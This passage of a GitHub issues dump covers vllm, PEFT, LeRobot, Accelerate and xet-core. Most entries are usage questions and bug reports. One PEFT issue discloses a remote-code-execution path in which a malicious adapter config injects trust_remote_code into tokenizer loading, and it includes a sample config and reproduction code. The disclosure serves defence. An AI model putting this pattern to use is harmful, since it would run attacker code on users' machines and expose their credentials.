syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm rep_good nopl cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy svm cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw perfctr_core ssbd ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx512_bf16 clzero xsaveerptr wbnoinvd arat npt lbrv nrip_save tsc_scale vmcb_clean flushbyasid pausefilter pfthreshold v_vmsave_vmload vgif vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid fsrm flush_l1d arch_capabilities\nVirtualization: AMD-V\nL1d cache: 3 MiB (48 instances)\nL1i cache: 3 MiB (48 instances)\nL2 cache: 24 MiB (48 instances)\nL3 cache: 768 MiB (48 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-47\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.14.1\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cuspa", "url": "https://github.com/vllm-project/vllm/issues/28003", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-03T21:19:15Z", "updated_at": "2025-11-26T15:32:40Z", "comments": 1, "user": "amitmvyas" }, { "repo": "vllm-project/vllm", "number": 27995, "title": "[RFC]: Make PassConfig flags less verbose", "body": "### Motivation.\n\nAlmost all `PassConfig` field names have `enable_` in the name, which is unnecessarily verbose. They are also pretty long, and sometimes not descriptive enough. Finally, `enable_fusion` should be split into rmsnorm+quant and activation+quant flags as we want to control these flags separately.\n\n### Proposed Change.\n\nWe should rename the flags:\n- `enable_async_tp` -> `fuse_gemm_comms`\n- `enable_attn_fusion` -> `fuse_attn_quant` \n- `enable_fi_allreduce_fusion` -> `fuse_allreduce_rms` \n- `enable_fusion` -> `fuse_norm_quant`, `fuse_act_quant`\n- `enable_noop` -> `eliminate_noops`\n- `enable_sequence_parallelism` -> `enable_sp`\n\nFor future RoPE-based fusion passes, the flags will look like:\n- `enable_qknorm_rope_fusion` -> `fuse_qknorm_rope`\n- `enable_rope_cache_fusion` -> `fuse_rope_cache`\n- ...\n\nWe can deprecate the original flags in the next release and map them to the new ones, and remove them 1 or even 2 releases later (shouldn't be hard to support). These flags will be used less commonly after `-O` optimization levels land anyway.\n\n### Feedback Period.\n\n1 week, 11/3 - 11/7\n\n### CC List.\n\n@zou3519 @youkaichao @mgoin @ilmarkov @nvpohanh @pavanimajety \n\n### Any Other Things.\n\nWith passes following a common construction convention, we can also add a `full_pass_pipeline` arg where users can control the exact order of the passes if necessary, but that is less likely to be needed urgently and can be added later.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27995", "state": "closed", "labels": [ "help wanted", "good first issue", "RFC", "torch.compile" ], "created_at": "2025-11-03T17:49:29Z", "updated_at": "2025-12-03T19:53:01Z", "comments": 7, "user": "ProExpertProg" }, { "repo": "huggingface/peft", "number": 2888, "title": "Potential remote code execution via untrusted tokenizer_kwargs in PromptEmbedding", "body": "### Description\n\nA remote code execution vector exists in the PEFT prompt-tuning flow. A remote `adapter_config.json` can inject loader kwargs that are forwarded to `AutoTokenizer.from_pretrained` calls. If an attacker sets `\"tokenizer_kwargs\": {\"trust_remote_code\": true}` and points `tokenizer_name_or_path` at an attacker-controlled repo, constructing the prompt embedding will cause `AutoTokenizer.from_pretrained(...)` to import and run code from that repo. This happens during normal initialization and requires no further user interaction.\n\n### Root Cause \n\n`PromptEmbedding` trusts and forwards fields from config into `AutoTokenizer.from_pretrained` without validating or sanitizing them:\n\nhttps://github.com/huggingface/peft/blob/30a19a08f9ef85ce1095b9ac69e78269121525e2/src/peft/tuners/prompt_tuning/model.py#L78-L84 \n\n### Impact\n\nThis issue turns remote configuration files into attack vectors. Any user who loads a malicious adapter config can have arbitrary code executed on their machine. The compromise is silent, requires no extra user action beyond `from_pretrained`, and is easy to weaponize by publishing a seemingly legitimate config that explicitly set `trust_remote_code=True` and points to attacker code. Consequences include command execution, credential and data theft, file tampering, and worm infection if environment tokens or write permissions are present. This should be fixed urgently by treating config-supplied kwargs as untrusted: filter or reject sensitive parameters such as `trust_remote_code`. \n\n### Who can help?\n\n@benjaminbossan @githubnemo\n\n### Reproduction\n\nA malicious remote config can look like:\n\n```json\n{\n \"base_model_name_or_path\": \"XManFromXlab/peft-prompt-embedding-rce\",\n \"tokenizer_name_or_path\": \"XManFromXlab/peft-prompt-embedding-rce\"\n \"tokenizer_kwargs\": { \"trust_remote_code\": true }\n}\n```\n\nWhen users are attracted to the repo and use peft to load the config from remote repo\n\n```python\nfrom peft import PromptEmbedding, PromptTuningConfig\nfrom transformers import AutoModelForSeq2SeqLM\n\nt5_model = AutoModelForSeq2SeqLM.from_pretrained(\"t5-base\")\n\nexample_model = \"XManFromXlab/peft-prompt-embedding-rce\"\nconfig = PromptTuningConfig.from_pretrained(example_model, trust_remote_code=False)\nprompt_embedding = PromptEmbedding(config, t5_model.shared)\n```\n\nDuring `PromptEmbedding` initialization the code reads `tokenizer_kwargs` from the remote config and calls `AutoTokenizer.from_pretrained(config.tokenizer_name_or_path, **tokenizer_kwargs)`. Because `trust_remote_code` was injected via the config, the loader imports and executes the attacker\u2019s backend code, demonstrating RCE.\n\n\n### Expected behavior\n\n\nIn my example, the above code will print the message 'Execute Malicious Payload!!!!!!', which indicates the execution of malicious scripts.\n\n```bash\n$ python3 main.py \nExecute Malicious Payload!!!!!! \nExecute Malicious Payload!!!!!!\nExecute Malicious Payload!!!!!! \n```", "url": "https://github.com/huggingface/peft/issues/2888", "state": "closed", "labels": [], "created_at": "2025-11-03T16:04:52Z", "updated_at": "2025-11-04T17:50:28Z", "comments": 3, "user": "Vancir" }, { "repo": "huggingface/lerobot", "number": 2371, "title": "memory increase continuously during training Groot", "body": "### System Info\n\n```Shell\n- lerobot version: 0.4.1\n- Platform: Linux-5.4.250-2-velinux1u3-amd64-x86_64-with-glibc2.31\n- Python version: 3.10.15\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.1.3\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4090\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nrun\n` lerobot-train \\\n --output_dir=$OUTPUT_DIR \\\n --save_checkpoint=true \\\n --batch_size=64 \\\n --steps=10000 \\\n --save_freq=1000 \\\n --log_freq=100 \\\n --policy.push_to_hub=false \\\n --policy.type=groot \\\n --dataset.repo_id=$DATASET_ID \\\n --dataset.root=$DATASET_ROOT_DIR \\\n --dataset.streaming=false \\\n --dataset.image_transforms.enable=true \\\n --wandb.enable=true \\\n --wandb.mode=offline \\\n --wandb.project=groot_test \\\n --job_name=$JOB_NAME \\`\n\n### Expected behavior\n\nmemory increase until out of memory", "url": "https://github.com/huggingface/lerobot/issues/2371", "state": "open", "labels": [ "question", "policies", "performance" ], "created_at": "2025-11-03T14:38:52Z", "updated_at": "2025-12-31T13:17:11Z", "user": "caoran2025" }, { "repo": "vllm-project/vllm", "number": 27982, "title": "[Usage]: How can I access or return hidden states (representations) after generation?", "body": "### Your current environment\n\nIn my training pipeline (GRPO), I need to access hidden-state representations of all layers and store prompt representations alongside generated sequences.\nIs there any supported way to extract or return hidden states from the vLLM inference engine?\n\nEnvironment\nvllm==0.11.0\nPython 3.12\n\n### How would you like to use vllm\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27982", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-03T13:01:51Z", "updated_at": "2025-11-04T03:07:40Z", "comments": 1, "user": "hakbari14" }, { "repo": "huggingface/lerobot", "number": 2368, "title": "Release 0.5.0", "body": "A Github Issue created for the upcoming release to discuss the planned features & changes:\n\n* Audio PR #967 \n* Bump transformers dependency to +v5", "url": "https://github.com/huggingface/lerobot/issues/2368", "state": "open", "labels": [ "bug", "question", "dependencies" ], "created_at": "2025-11-03T12:46:51Z", "updated_at": "2025-12-24T00:08:16Z", "user": "imstevenpmwork" }, { "repo": "vllm-project/vllm", "number": 27981, "title": "[Usage]: qwenvl2.5\u5982\u4f55\u6307\u5b9amax_pixels", "body": "### Your current environment\n\n\u5982\u9898\uff0c\u6211\u5c1d\u8bd5\u4e86``--mm-processor-kwargs {\"max_pixels\": $MAX_PIXELS}``\u65e0\u6548\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27981", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-03T12:38:34Z", "updated_at": "2025-11-04T08:19:54Z", "comments": 3, "user": "aJupyter" }, { "repo": "huggingface/accelerate", "number": 3829, "title": "Does Accelerate automatically set the DataLoader\u2019s sampler to a DistributedSampler?", "body": "```python\nfrom accelerate import Accelerator\naccelerator = Accelerator()\n\ndevice = accelerator.device\nmodel, optimizer, training_dataloader, scheduler = accelerator.prepare(\n model, optimizer, training_dataloader, scheduler\n)\n\nfor batch in training_dataloader:\n optimizer.zero_grad()\n inputs, targets = batch\n outputs = model(inputs)\n loss = loss_function(outputs, targets)\n accelerator.backward(loss)\n optimizer.step()\n scheduler.step()\n```\n\nWe know that in PyTorch DDP training the DataLoader must use torch.utils.data.DistributedSampler. In this code, when using Accelerate, do we need to manually set DistributedSampler when constructing the `training_dataloader`, or will Accelerate automatically modify the dataloader\u2019s sampler to support DDP later? (In other words, when we build the dataloader for Accelerate, can we completely ignore DistributedSampler and just leave it as we would for single\u2011GPU training?)", "url": "https://github.com/huggingface/accelerate/issues/3829", "state": "closed", "labels": [], "created_at": "2025-11-03T07:17:29Z", "updated_at": "2025-12-16T15:09:43Z", "comments": 2, "user": "caixxiong" }, { "repo": "vllm-project/vllm", "number": 27957, "title": "[Usage]: What is the difference between embedding task and pooler task?", "body": "### Your current environment\n\nAny document about this? \n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27957", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-03T03:38:39Z", "updated_at": "2025-11-03T10:20:18Z", "comments": 1, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 27949, "title": "[Usage]: How do I deploy GGUF models with vLLM via Docker correct?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\nHere is the output from `sudo python3 collect_env.py`\n\n```\nTraceback (most recent call last):\n File \"/export/nvme/vllm/collect_env.py\", line 18, in \n import regex as re\nModuleNotFoundError: No module named 'regex'\n```\n\n### How would you like to use vllm\n\nI am using an Ubuntu 22.04 LTS LXC in Proxmox.\n\nI have Docker installed.\n\nI downloaded `https://huggingface.co/unsloth/DeepSeek-R1-Distill-Llama-70B-GGUF/resolve/main/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf?download=true` to `/export/nvme/huggingface/DeepSeek-R1-Distill-Llama-70B-GGUF/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf` via `wget`.\n\nThe command that I am trying to use to start said Docker container is:\n\n```\nsudo docker run --runtime nvidia --gpus all \\\n --name vllm \\\n -v /export/nvme/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF:/root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF \\\n -v /export/nvme/vllm:/export/nvme/vllm \\\n -e TRANSFORMERS_OFFLINE=1 \\\n --shm-size=16G \\\n -v /dev/shm:/dev/shm \\\n -p 0.0.0.0:8000:8000 \\\n --security-opt apparmor:unconfined \\\n vllm/vllm-openai:v0.8.5 \\\n --model /root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf \\\n --tokenizer /root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B \\\n --tensor-parallel-size 2 \\\n --max-model-len=32K \\\n --chat-template=/export/nvme/vllm/examples/tool_chat_template_deepseekr1.jinja\n```\n\nBut this is the error message that I get:\n```\nINFO 11-02 15:21:55 [__init__.py:239] Automatically detected platform cuda.\nINFO 11-02 15:21:59 [api_server.py:1043] vLLM API server version 0.8.5\nINFO 11-02 15:21:59 [api_server.py:1044] args: Namespace(host=None, port=8000, uvicorn_log_level='info', disable_uvicorn_access_log=False, allow_credentials=False, allowed_origins=['*'], allowed_methods=['*'], allowed_headers=['*'], api_key=None, lora_modules=None, prompt_adapters=None, chat_template='/export/nvme/vllm/examples/tool_chat_template_deepseekr1.jinja', chat_template_content_format='auto', response_role='assistant', ssl_keyfile=None, ssl_certfile=None, ssl_ca_certs=None, enable_ssl_refresh=False, ssl_cert_reqs=0, root_path=None, middleware=[], return_tokens_as_token_ids=False, disable_frontend_multiprocessing=False, enable_request_id_headers=False, enable_auto_tool_choice=False, tool_call_parser=None, tool_parser_plugin='', model='/root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf', task='auto', tokenizer='/root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B', hf_config_path=None, skip_tokenizer_init=False, revision=None, code_revision=None, tokenizer_revision=None, tokenizer_mode='auto', trust_remote_code=False, allowed_local_media_path=None, load_format='auto', download_dir=None, model_loader_extra_config={}, use_tqdm_on_load=True, config_format=, dtype='auto', max_model_len=32768, guided_decoding_backend='auto', reasoning_parser=None, logits_processor_pattern=None, model_impl='auto', distributed_executor_backend=None, pipeline_parallel_size=1, tensor_parallel_size=2, data_parallel_size=1, enable_expert_parallel=False, max_parallel_loading_workers=None, ray_workers_use_nsight=False, disable_custom_all_reduce=False, block_size=None, gpu_memory_utilization=0.9, swap_space=4, kv_cache_dtype='auto', num_gpu_blocks_override=None, enable_prefix_caching=None, prefix_caching_hash_algo='builtin', cpu_offload_gb=0, calculate_kv_scales=False, disable_sliding_window=False, use_v2_block_manager=True, seed=None, max_logprobs=20, disable_log_stats=False, quantization=None, rope_scaling=None, rope_theta=None, hf_token=None, hf_overrides=None, enforce_eager=False, max_seq_len_to_capture=8192, tokenizer_pool_size=0, tokenizer_pool_type='ray', tokenizer_pool_extra_config={}, limit_mm_per_prompt={}, mm_processor_kwargs=None, disable_mm_preprocessor_cache=False, enable_lora=None, enable_lora_bias=False, max_loras=1, max_lora_rank=16, lora_extra_vocab_size=256, lora_dtype='auto', long_lora_scaling_factors=None, max_cpu_loras=None, fully_sharded_loras=False, enable_prompt_adapter=None, max_prompt_adapters=1, max_prompt_adapter_token=0, device='auto', speculative_config=None, ignore_patterns=[], served_model_name=None, qlora_adapter_name_or_path=None, show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, disable_async_output_proc=False, max_num_batched_tokens=None, max_num_seqs=None, max_num_partial_prefills=1, max_long_partial_prefills=1, long_prefill_token_threshold=0, num_lookahead_slots=0, scheduler_delay_factor=0.0, preemption_mode=None, num_scheduler_steps=1, multi_step_stream_outputs=True, scheduling_policy='fcfs', enable_chunked_prefill=None, disable_chunked_mm_input=False, scheduler_cls='vllm.core.scheduler.Scheduler', override_neuron_config=None, override_pooler_config=None, compilati", "url": "https://github.com/vllm-project/vllm/issues/27949", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-02T23:33:49Z", "updated_at": "2025-11-02T23:36:44Z", "comments": 1, "user": "alpha754293" }, { "repo": "huggingface/xet-core", "number": 549, "title": "How to get the \"Xet backed hash\"?", "body": "Hi,\n\nOn HuggingFace, every page has a \"Xet backed hash\" (I've attached an example below) and I am trying to figure out how to compute that locally.\n\nI've read the documentation and it says there are 4 types of different hashes but it's not really clear how a \"Xet backed hash\" is calculated.\n\nSo I was just wondering if you can you tell me how I can get the \"Xet backed hash\" on a local file?\n\nThank you for your time.\n\n\"Image\"", "url": "https://github.com/huggingface/xet-core/issues/549", "state": "closed", "labels": [], "created_at": "2025-11-02T09:40:39Z", "updated_at": "2025-11-06T16:20:25Z", "user": "arch-btw" }, { "repo": "huggingface/lerobot", "number": 2360, "title": "diffusion transformer", "body": "\u8bf7\u95ee\u6709\u5927\u4f6c\u5728lerobot\u4e2d\u5c06diffusion unet\u6539\u4e3aDiT\u8fc7\u5417", "url": "https://github.com/huggingface/lerobot/issues/2360", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-11-02T09:05:30Z", "updated_at": "2025-11-12T09:01:59Z", "user": "Benxiaogu" }, { "repo": "vllm-project/vllm", "number": 27928, "title": "[Bug]: What happened to /get_world_size ?", "body": "### Your current environment\n\nvllm 0.11.0\ntrl 0.24.0\npython 3.12\nlinux amd64\n\n### \ud83d\udc1b Describe the bug\n\nTRL is expecting a `/get_world_size` route https://github.com/huggingface/trl/blob/main/trl/extras/vllm_client.py#L279 for its GRPO trainer. That gives a 404 on the latest version of vLLM. \n\nWas this changed to another route? I can't seem to find it\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27928", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-01T22:56:45Z", "updated_at": "2025-11-03T02:42:14Z", "comments": 1, "user": "pbarker-synth" }, { "repo": "huggingface/lerobot", "number": 2356, "title": "AsyncInference only running one action chunk", "body": "I have my SO101 arms connected to my computer, and I'm running an asynchronous server on a cloud GPU with a RTX 4090.\n\nWhen I start running Pi0.5, the model is loaded and the SO101 makes its first move by setting the robot to be at its middle position, but then no further actions are made although the server logs new observations and action sequences being generated.\n\nThe robot moves to this position and doesn't move further:\n\n\"Image\"\n\nI have one wrist camera and one top-down view camera. Here is my client command:\n```\npython3 -m lerobot.async_inference.robot_client \\\n --server_address=ip:port \\\n --robot.type=so101_follower \\\n --robot.port=/dev/ttyACM0 \\\n --robot.id=arm \\\n --robot.cameras=\"{ base_0_rgb: {type: opencv, index_or_path: \\\"/dev/video2\\\", width: 640, height: 480, fps: 30}, left_wrist_0_rgb: {type: opencv, index_or_path: \\\"/dev/video0\\\", width: 640, height: 480, fps: 30}}\" \\\n --policy_device=cuda \\\n --aggregate_fn_name=weighted_average \\\n --debug_visualize_queue_size=True \\\n --task=\"Pick up the orange and place it on the plate\" \\\n --policy_type=pi05 \\\n --pretrained_name_or_path=lerobot/pi05_base \\\n --actions_per_chunk=50 \\\n --chunk_size_threshold=0.0 \\\n --debug_visualize_queue_size=True\n```\n\nHere are my server logs:\n```\n(lerobot) root@eff66f201198:/workspace/arm-x64# ./robot.sh runpod async-server\nINFO 2025-11-01 20:17:34 y_server.py:421 {'fps': 30,\n 'host': '0.0.0.0',\n 'inference_latency': 0.03333333333333333,\n 'obs_queue_timeout': 2,\n 'port': 8080}\nINFO 2025-11-01 20:17:34 y_server.py:431 PolicyServer started on 0.0.0.0:8080\nINFO 2025-11-01 20:18:03 y_server.py:112 Client ipv4:129.97.131.28:23025 connected and ready\nINFO 2025-11-01 20:18:03 y_server.py:138 Receiving policy instructions from ipv4:129.97.131.28:23025 | Policy type: pi05 | Pretrained name or path: lerobot/pi05_base | Actions per chunk: 50 | Device: cuda\nThe PI05 model is a direct port of the OpenPI implementation. \nThis implementation follows the original OpenPI structure for compatibility. \nOriginal implementation: https://github.com/Physical-Intelligence/openpi\nINFO 2025-11-01 20:18:03 ils/utils.py:43 Cuda backend detected, using cuda.\nWARNING 2025-11-01 20:18:03 /policies.py:82 Device 'mps' is not available. Switching to 'cuda'.\nINFO 2025-11-01 20:18:03 ils/utils.py:43 Cuda backend detected, using cuda.\nWARNING 2025-11-01 20:18:03 /policies.py:82 Device 'mps' is not available. Switching to 'cuda'.\nLoading model from: lerobot/pi05_base\n\u2713 Loaded state dict from model.safetensors\nWARNING 2025-11-01 20:19:08 ng_pi05.py:1023 Vision embedding key might need handling: paligemma_with_expert.paligemma.model.vision_tower.vision_model.embeddings.patch_embedding.bias\nWARNING 2025-11-01 20:19:08 ng_pi05.py:1023 Vision embedding key might need handling: paligemma_with_expert.paligemma.model.vision_tower.vision_model.embeddings.patch_embedding.weight\nRemapped: action_in_proj.bias -> model.action_in_proj.bias\nRemapped: action_in_proj.weight -> model.action_in_proj.weight\nRemapped: action_out_proj.bias -> model.action_out_proj.bias\nRemapped: action_out_proj.weight -> model.action_out_proj.weight\nRemapped: paligemma_with_expert.gemma_expert.lm_head.weight -> model.paligemma_with_expert.gemma_expert.lm_head.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.bias -> model.paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.bias\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.mlp.down_proj.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.mlp.down_proj.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.mlp.gate_proj.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.mlp.gate_proj.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.mlp.up_proj.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.mlp.up_proj.weight\nRemapped 812 state dict keys\nWarning: Could not remap state dict keys: Error(s) in loading state_dict for PI05Policy:\n\tMissing key(s) in state_dict: \"model.paligemma_with_expert.paligemma.model.language_model.embed_tokens.weight\". \nINFO 2025-11-01 20:19:43 y_server.py:171 Time taken to put policy on cuda: 99.9787 seconds\nINFO 2025-11-01 20:19:43 ort/utils.py:74 Starting receiver\nINFO 2025-11-01 20:20:02 y_server.py:226 Running inference for observation #0 (must_go: True)\nINFO 2025-11-01 20:20:03 ort/utils.py:74 Starting receiver\nINFO 2025-11-01 20:20:04 y_server.py:362 Preprocessing and inference took 1.3530s, action shape: torch.Size([1, 50, 32])\nINFO 2025-11-01 20:20:04 y_server.py:392 Observation ", "url": "https://github.com/huggingface/lerobot/issues/2356", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-11-01T20:31:10Z", "updated_at": "2025-12-23T01:10:35Z", "user": "kevinjosethomas" }, { "repo": "vllm-project/vllm", "number": 27916, "title": "[Feature]: Does the latest version support LoRa for visual models?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWhen I loaded the QWEN2.5-VL model fine-tuned by LoRa using vllm version 0.8.4, I encountered the following prompt:\n\n> Regarding multimodal models, vLLM currently only supports adding LoRA to language model, visual.blocks.31.mlp.up_proj will be ignored.\n\nI found an issue https://github.com/vllm-project/vllm/issues/26422 with a similar problem, but it seems the PR hasn't been merged into master. How can I enable loading visual-side LORA parameters and using VLLM to accelerate inference?\n\nLooking forward to your reply\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27916", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-11-01T12:23:36Z", "updated_at": "2025-12-26T12:48:22Z", "comments": 1, "user": "SmartNight-cc" }, { "repo": "huggingface/lerobot", "number": 2354, "title": "Cannot reproduce SmolVLA results on LIBERO benchmark", "body": "Hello,\n\nI am trying to reproduce LIBERO benchmark results of [SmolVLA](https://huggingface.co/HuggingFaceVLA/smolvla_libero).\nHowever, I can't reproduce results on neither [leaderboard](https://huggingface.co/spaces/HuggingFaceVLA/libero-vla-leaderboard) and [paper](https://arxiv.org/abs/2506.01844)\n\nI am working on NVIDIA Jetson AGX Orin Developer Kit (Jetpack 6.2.1, Jetson Linux 36.4.4)\nand below is my pip list\n\nHello,\n\nI am trying to reproduce the LIBERO benchmark results of [SmolVLA](https://huggingface.co/HuggingFaceVLA/smolvla_libero). \nHowever, I can't reproduce the results on either the [leaderboard](https://huggingface.co/spaces/HuggingFaceVLA/libero-vla-leaderboard) or the [paper](https://arxiv.org/abs/2506.01844).\n\nI am working on an NVIDIA Jetson AGX Orin Developer Kit (JetPack 6.2.1, Jetson Linux 36.4.4), \nand below is my pip list.\n\n
\npip list\n\n```\nabsl-py==2.3.1\naccelerate==1.10.1\naiohappyeyeballs==2.6.1\naiohttp==3.13.0\naiosignal==1.4.0\nannotated-types==0.7.0\nantlr4-python3-runtime==4.9.3\nanyio==4.9.0\nargon2-cffi==23.1.0\nargon2-cffi-bindings==21.2.0\narrow==1.3.0\nasttokens==3.0.0\nasync-lru==2.0.5\nattrs==23.2.0\nav==15.1.0\nbabel==2.17.0\nbddl==1.0.1\nbeautifulsoup4==4.13.4\nbleach==6.2.0\nblinker==1.7.0\ncertifi==2025.1.31\ncffi==1.17.1\ncharset-normalizer==3.4.1\nclick==8.3.0\ncloudpickle==3.1.1\ncmake==3.31.6\ncomm==0.2.2\ncontourpy==1.3.2\ncryptography==41.0.7\ncuda-bindings==12.8.0\ncuda-python==12.8.0\ncycler==0.12.1\nCython==3.0.12\ndataclasses==0.6\ndatasets==4.1.1\ndbus-python==1.3.2\ndebugpy==1.8.14\ndecorator==5.2.1\ndeepdiff==8.6.1\ndefusedxml==0.7.1\ndiffusers @ file:///opt/diffusers-0.34.0.dev0-py3-none-any.whl#sha256=cf07a8004c994f02e0d41e9bface90486f53a98cd3abdda39972c5ffe7009d87\ndill==0.4.0\ndistro==1.9.0\ndocopt==0.6.2\ndocutils==0.21.2\ndraccus==0.10.0\neasydict==1.13\negl_probe @ git+https://github.com/huggingface/egl_probe.git@eb5e5f882236a5668e43a0e78121aaa10cdf2243\neinops==0.8.1\netils==1.13.0\nevdev==1.9.2\nexecuting==2.2.0\nFarama-Notifications==0.0.4\nfastjsonschema==2.21.1\nfilelock==3.18.0\nfonttools==4.57.0\nfqdn==1.5.1\nfrozenlist==1.8.0\nfsspec==2025.3.2\nfuture==1.0.0\ngitdb==4.0.12\nGitPython==3.1.45\nglfw==2.10.0\ngrpcio==1.75.1\ngym==0.26.2\ngym-notices==0.1.0\ngymnasium==0.29.1\nh11==0.14.0\nh5py==3.13.0\nhf-xet==1.1.10\nhf_transfer==0.1.9\nhttpcore==1.0.8\nhttplib2==0.20.4\nhttpx==0.28.1\nhuggingface-hub==0.35.3\nhydra-core==1.3.2\nid==1.5.0\nidna==3.10\nimageio==2.37.0\nimageio-ffmpeg==0.6.0\nimportlib_metadata==8.6.1\nimportlib_resources==6.5.2\niniconfig==2.1.0\ninquirerpy==0.3.4\nipykernel==6.29.5\nipython==9.1.0\nipython_pygments_lexers==1.1.1\nipywidgets==8.1.6\nisoduration==20.11.0\njaraco.classes==3.4.0\njaraco.context==6.0.1\njaraco.functools==4.1.0\njedi==0.19.2\njeepney==0.9.0\nJinja2==3.1.6\njson5==0.12.0\njsonlines==4.0.0\njsonpointer==3.0.0\njsonschema==4.23.0\njsonschema-specifications==2025.4.1\njupyter==1.1.1\njupyter-console==6.6.3\njupyter-events==0.12.0\njupyter-lsp==2.2.5\njupyter_client==8.6.3\njupyter_core==5.7.2\njupyter_server==2.15.0\njupyter_server_terminals==0.5.3\njupyterlab==4.4